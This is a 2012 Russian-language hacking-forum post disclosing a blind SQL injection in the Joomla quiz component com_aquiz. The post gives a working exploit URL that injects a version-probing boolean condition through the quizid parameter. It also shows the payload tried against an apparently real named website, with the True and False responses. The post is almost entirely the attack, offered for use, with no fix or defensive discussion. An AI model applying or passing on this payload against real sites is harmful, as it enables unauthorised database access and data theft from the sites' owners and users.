13.01.2012, 20:26
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
com_aquiz
Blind SQL Injection в Joomla
Уязвимость в компоненте для тестов " com_aquiz".
Exploit:
Код:
http://site.ru/index.php?option=com_aquiz&task=take&quizid=1885+and+/*!mid(version(),1,1)=5*/+--+
Уязвимый параметр: quizid
Example:
Сообщение от None
_http://ajama.ru/index.php?option=com_aquiz&task=take&quizid=1885+a nd+/*!mid(version(),1,1)=5*/+--+ True
Сообщение от None
_http://ajama.ru/index.php?option=com_aquiz&task=take&quizid=1885+a nd+/*!mid(version(),1,1)=4*/+--+ False
-----------------------------------------------------------
(c) By winstrool
|
|
|